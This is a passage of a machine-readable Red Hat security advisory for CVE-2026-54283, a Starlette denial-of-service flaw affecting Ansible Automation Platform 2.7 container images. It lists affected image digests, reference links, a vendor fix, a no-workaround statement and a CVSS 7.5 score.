"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-54283"
},
{
"category": "external",
"summary": "RHBZ#2491440",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2491440"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-54283",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-54283"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-54283",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54283"
},
{
"category": "external",
"summary": "https://github.com/Kludex/starlette/security/advisories/GHSA-82w8-qh3p-5jfq",
"url": "https://github.com/Kludex/starlette/security/advisories/GHSA-82w8-qh3p-5jfq"
}
],
"release_date": "2026-06-22T16:46:16.706000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T18:38:09+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.7#Upgrade",
"product_ids": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50340"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
